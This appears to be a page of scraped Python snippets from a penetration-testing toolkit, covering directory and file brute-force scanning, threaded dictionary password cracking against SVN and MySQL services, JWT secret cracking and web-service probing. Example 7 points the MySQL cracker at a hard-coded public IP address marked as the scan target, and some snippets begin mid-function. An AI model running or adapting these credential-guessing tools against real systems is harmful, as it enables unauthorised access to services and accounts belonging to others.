示例#1
0
 def scan_file_plus(self):
     file_payload = [
         self.url + formatPath(i.strip())
         for i in readFile(self.wordsList_plus)
     ]
     fileScanProcess = MyThreadPool(self.scan, file_payload,
                                    self.maxconnections)
     fileScanProcess.start()
示例#2
0
 def scan_path(self):
     path_payload = [
         self.url + formatPath(i.strip())
         for i in readFile(self.cachePath_txt)
     ]
     pathScanProcess = MyThreadPool(self.scan, path_payload,
                                    self.maxconnections)
     pathScanProcess.start()
示例#3
0
def weakPwdCrack_Svn(ip, user_list=None, pwd_list=None, resultFile=None):
    if resultFile == None:
        resultFile = '{}result/{}_{}.txt'.format(base_root, ip, time.time())

    if user_list == None:
        user_list = readFile(
            '{}payload/dict/user_database.txt'.format(base_root))

    if pwd_list == None:
        pwd_list = readFile(
            '{}payload/dict/passwd_top10.txt'.format(base_root))

    #生成在多线程里使用的关键函数
    def connectSvn_forThread(passwd, otherArgs):
        ip = otherArgs['ip']
        user = otherArgs['user']
        passwd = passwd.strip()
        print('crack user:[{}]/pwd:[{}]'.format(user, passwd))
        (flag, userAndpwd) = connect_svn(ip, user, password=passwd)
        if flag:
            print('[FOUND] user:[{}]/pwd:[{}],result out is [{}]'.format(
                user, passwd, userAndpwd))
            time.sleep(1.5)  # 多线程写入文件时,可能存在条件竞争,添加睡眠时间尽可能防止其出现
            writeFile(resultFile,
                      '[user:[{}]/pwd:[{}]\r\n'.format(user, passwd))
            time.sleep(1.5)  # 多线程写入文件时,可能存在条件竞争,添加睡眠时间尽可能防止其出现

    #爆破和用户名相似的密码
    for user in user_list:
        user = user.strip()
        userNameAlikePwd = getUserNameAlikePwd(user)
        otherArgs = {'ip': ip, 'user': user}
        crackFtpThread = MyThreadPool(connectSvn_forThread,
                                      userNameAlikePwd,
                                      other_args=otherArgs)
        crackFtpThread.start()

    # 爆破字典里面的密码
    for user in user_list:
        user = user.strip()
        otherArgs = {'ip': ip, 'user': user}
        crackFtpThread = MyThreadPool(connectSvn_forThread,
                                      pwd_list,
                                      other_args=otherArgs)
        crackFtpThread.start()
示例#4
0
def weakPwdCrack_jwt(token, code='ascii', key_list=None, resultFile=None):
    if key_list == None:
        key_list = readFile('{}payload/dict/passwd_1w.txt'.format(base_root))
    if resultFile == None:
        resultFile = '{}result/jwt_{}.txt'.format(base_root, time.time())

    myProcess = MyProcessPool(jwtCrack, key_list, other_args=token)
    myProcess.start()
    writeFile(resultFile, '[FOUND] key:{}'.format(myProcess.result))
示例#5
0
def getWeb(ip_port_list=None,targetFile=None,resultFile=None):
    if targetFile:
        ip_port_list = readFile(targetFile)
    if resultFile == None:
        resultFile = '{}result/web_{}.txt'.format(base_root,time.time())

    getWebThread = MyThreadPool(isWeb,ip_port_list)
    getWebThread.start()
    writeFile(resultFile,'{}'.format(getWebThread.result))
示例#6
0
    def creatCachePathPayload(self):
        self.clearCacheTxt()
        extensionList = self.getExtensionList()

        #创建path缓存文件
        try:
            for fileName in readFile(self.wordsFile):
                writeFile(self.cachePath_txt, '{}\n'.format(fileName.strip()))
            for fileName in self.keyWords:
                writeFile(self.cachePath_txt, '{}\n'.format(fileName))
        except Exception as e:
            print(e)
            pass

        #创建file缓存文件
        try:
            for fileName in readFile(self.wordsFile):
                for exten in extensionList:
                    writeFile(
                        self.cacheFile_txt,
                        '{}.{}\n'.format(fileName.strip(), exten.strip()))
            for fileName in self.keyWords:
                for exten in extensionList:
                    writeFile(
                        self.cacheFile_txt,
                        '{}.{}\n'.format(fileName.strip(), exten.strip()))
        except Exception as e:
            print(e)
            pass

        getRemoveDupFile(self.cachePath_txt)
        getRemoveDupFile(self.cacheFile_txt)
        self.clearCacheTxt()
        os.system('mv {} {}'.format(self.cachePath_txt + '.rd',
                                    self.cachePath_txt))
        os.system('mv {} {}'.format(self.cacheFile_txt + '.rd',
                                    self.cacheFile_txt))
示例#7
0
            'port': port,
            'database': database
        }
        crackFtpThread = MyThreadPool(connectMysql_forThread,
                                      userNameAlikePwd,
                                      other_args=otherArgs)
        crackFtpThread.start()

    # 爆破字典里面的密码
    for user in user_list:
        user = user.strip()
        otherArgs = {
            'ip': ip,
            'user': user,
            'port': port,
            'database': database
        }
        crackFtpThread = MyThreadPool(connectMysql_forThread,
                                      pwd_list,
                                      other_args=otherArgs)
        crackFtpThread.start()


if __name__ == '__main__':
    last_time = time.time()
    # pwd_list = readFile('{}payload/dict/passwd_1w.txt'.format(base_root))
    pwd_list = readFile('{}payload/dict/passwd_top10.txt'.format(base_root))
    ip = '167.88.178.54'  # 扫描目标
    weakPwdCrack_mysql(ip, pwd_list=pwd_list)
    print('total time is {}'.format(time.time() - last_time))
示例#8
0
def file_dedu(target_file, result_file):
    test = readFile(target_file)
    test = deduplication_list(test)
    for i in test:
        writeFile(result_file, i)